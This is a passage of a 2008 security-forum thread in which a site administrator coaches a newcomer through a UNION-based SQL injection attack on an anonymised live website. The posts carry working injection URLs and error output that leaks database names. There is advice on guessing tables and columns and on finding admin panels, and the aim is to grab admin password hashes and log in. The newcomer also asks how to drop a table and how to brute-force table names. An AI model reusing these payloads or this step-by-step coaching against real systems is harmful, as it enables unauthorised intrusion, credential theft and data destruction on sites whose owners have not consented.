 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
|
 |
 Posted: Mon May 26, 2008 12:37 pm |
 |
|
| tinman |
| Active user |
 |
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
 |
|
 |
|
Here is what I am getting when I run the queries:
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+mysql.user--+
| Quote: | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM mysql.user-- . SELECT command denied to user '**REVEALS_A_USERNAME**'@'localhost' for table 'user'
|
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+USER(),2,3,4,5,6,7,8--+
| Quote: | **REVEALS_A_USERNAME**@localhost
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes |
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+DATABASE(),2,3,4,5,6,7,8--+
| Quote: | **DIFFERENT_USERNAME**
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes |
The other queries all fail with output like this:
| Quote: |
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM user-- . Table '**SECOND_USERNAME**.user' doesn't exist |
I know one table is called 'poll'. I have a suspicion that this is part of a phpbb db, but table names like phpbb_users, phpbb_posts etc don't give me any results.
You guys are good, very good  Is there a way I can just drop the table 'poll' ? |
|
|
|
|
|
|
|
|
| Posted: Mon May 26, 2008 12:58 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
1. No, you can't drop that sql table in easy way.
2. You must analyze that website - is it running some forum, blog or CMS? Can you indentify which one? Is there anywhere user login possibilities? Try "victim.com/admin", "victim.com/admin.php" and other traditional admin interface places. You must guess sql table name before getting deeper! For example in case of phpbb and many other forums and CMS-s there is prefix which can be different from default. This can be bruteforced (if it's short) or just guessed. And one way to reveal database schema is to provoke more sql errors. So play with various URL-s and GET/POST parameters and try to get as much as possible various sql errors.
And try other "usual" table names:
news, sessions,logins,data,pages,page,people,post,posts,conf,config,pic,pictures, etc etc. This can get you better "inside look" of database internals.
One more thing: "SECOND_USERNAME" is actually database name. Does it show, what software engine is used? |
|
|
|
|
|
|
|
|
| Posted: Mon May 26, 2008 1:45 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
| Quote: | second_username
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%) |
Is what it shows, and I would imagine that it would be the database name.
So now I need to guess the tables to get any further? |
|
|
|
|
| Posted: Mon May 26, 2008 1:58 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yes. There are multiple scenarios:
1. That website does not contain web-based admin interface at all all, same with any user accounts. In means that specific sql injection is basically useless.
2. Website contains admin interface. If you can guess database table with admin password hashes, then maybe you can log in as admin. Next step depends on specific admin interface features.
3. Website contains user accounts. In this case user data theft is possible, but i'm not sure, that this will help you.
So your best shot is still possible admin interface. |
|
|
|
|
| Posted: Mon May 26, 2008 2:11 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon May 26, 2008 2:42 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
1. Try this:
| Code: |
http://yourtarget.com/phpbb/memberlist.php?start=-1
|
If you are lucky, then nice sql error message pops up.
2. Search google:
| Code: |
site:yourtarget.com "SQL Error"
|
|
|
|
|
|
| Posted: Mon May 26, 2008 2:52 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
No go on either 
There are some remenants of an old ikonboard forum at the site, but it redirects to phpbb 2.0.22
Other than guessing the tables, I'm stuffed!
Thank you all for your help anyway. Appreciate your time Gentlemen. |
|
|
|
|
| Posted: Wed May 28, 2008 7:52 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
Gentlemen, I have a limited grasp of SQL. Can you break this down a little for me, so I can understand it properly?
Why are we saying minus 1 (-1)?
| Quote: | | What are the '+' signs for? |
Is it to encode the URL spaces?
+UNION+ALL+SELECT+ (I'm ok with that)
| Quote: | | COUNT(*),2,3,4,5,6,7,8 |
I don't get this?
Why the two dashes on the end of 'users'
I know this must be tedious to answer, but it would help me no end. I've made a basic search but I can't make it out.
Thank you for your help, if you get the time. |
|
|
|
|
|
|
|
|
| Posted: Wed May 28, 2008 8:48 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
1. "id=-1" is id, which is probably invalid (usually id-s are >=1), so main sql query will fetch 0 results and it's easier to fetch our own data (with UNION).
2. "+UNION+SELECT+" is same as " UNION SELECT " or "%20UNION%20SELECT%20". It's just my personal habit, because "+" signs as urlencoded spaces look somehow cleaner in url 
3. "COUNT(*),2,3,4,5,6,7,8" - what part you don't understand? It's traditional UNION attack with 8 columns and as i am trying to guess table name and i don't know any field names either, then COUNT(*) is very useful - it will work without field name(s). Now if we have lucky and database has right table, then we can see count of rows, in case of users table it's count of user entries. And now, when we have table name, next thing is fields guessing:
"UNION+ALL+SELECT+COUNT(username),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(name),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(login),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pass),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pwd),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(lpassword),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(hash),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(md5),2,3,4,5,6,7,8+FROM+users"
... etc etc etc ... till you have all wanted field names
4. "+FROM+users--+" is again my personal habit and style concerning ending comments. You know that sql injection trick from tutorials:
"UNION ALL SELECT 1,2,3,4/*"
That's commenting out using C-style comments "/*"
But mysql allows other comment types too, like two dashes and one space. And again space can be urlencoded as "+".
So it's kind of good looking commenting out: "--+"
It can be "/*", "--%20" or "-- ", they all work as expected.
So as you can see i am not just copycat-ing sql injection tutorials, but instead develope new styles and tricks.
One example: collation errors. They are common problems in way of sql injection exploitation and usual counter measure is "CAST" or "CONVERT".
But in case of mysql version 5.x i suggest UNHEX(HEX(field)) construction. |
|
|
|
|
|
|
|
|
| Posted: Thu May 29, 2008 9:09 am |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
So the count(*) is a wildcard to return any field.
The 1,2,3,4,5,6,7,8 returns 8 columns ( so 1,2,3,4,5,6,7,8,9 would return 9 and 1,2,3,4 would return 4?) Why do we settle for 8? Is there a reason for this?
Understand +
Understand --+ (I was taught # in SQL but yours looks a whole lot better )
Thank you again. |
|
|
|
|
| Posted: Thu May 29, 2008 9:15 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
1. COUNT(*) is just "count all rows":
http://dev.mysql.com/doc/refman/5.0/en/counting-rows.html
2. needed column number (in case of example it's eight) must be found previously
"UNION ALL SELECT 1--+" --> error message about column count mismatch
"UNION ALL SELECT 1,2--+" --> error message
"UNION ALL SELECT 1,2,3--+" --> error message
...
"UNION ALL SELECT 1,2,3,4,5,6,7,8--+" --> no error message about column count mismatchs |
|
|
|
|
| Posted: Thu May 29, 2008 5:05 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
Ha Ha Ha!!! Fantastic!
Thank you for that! You keep knocking until you get in!
If only I could find a brute force script to keep knocking the door for this:
-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**BRUTE FORCE**--+
Perhaps I should learn how to write shell scripts? How would I work out to keep looping on the response would be my first problem I guess. |
|
|
|
|
|
|
|
|
| Posted: Thu May 29, 2008 10:55 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
My personal favorite is php, so i'd use php CLI as programming platform. But anything else can be used.
One thing to mention - mysql is evolving and right there is less 5.x version and more 4.x in use. But i'm sure, that after 1-2 years most mysql servers are 5.x+. So information_schema system catalog ...
http://dev.mysql.com/doc/refman/5.0/en/information-schema.html
... will be widely available and no need for guessing or bruteforce anymore
I love progress... |
|
|
|
|
|
|
|
|
| Posted: Fri May 30, 2008 7:02 am |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
| waraxe wrote: | | I love progress... |
ROFL!
Now here is a funny thing. We established that this was a Mysql 4 x server.
I execute this, just out of curiosity:
| Quote: | | http://www.xxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+information_schema.tables--+ |
and I get this:
| Quote: | | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM information_schema.tables-- . SELECT command denied to user 'xxxxx_xxxxx'@'localhost' for table 'tables' |
I guess this is because only the root user has access to it on 4-x? |
|
|
|
|
|
|
|
|
| Posted: Fri May 30, 2008 11:26 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
In 4.x there should not be "information_schema" at all.
Try this:
| Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables--+
|
| Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+test_schema.tables--+
|
| Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.test_tables--+
|
And describe error messages. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 3
Goto page Previous1, 2, 3Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 53
Members: 0
Total: 53
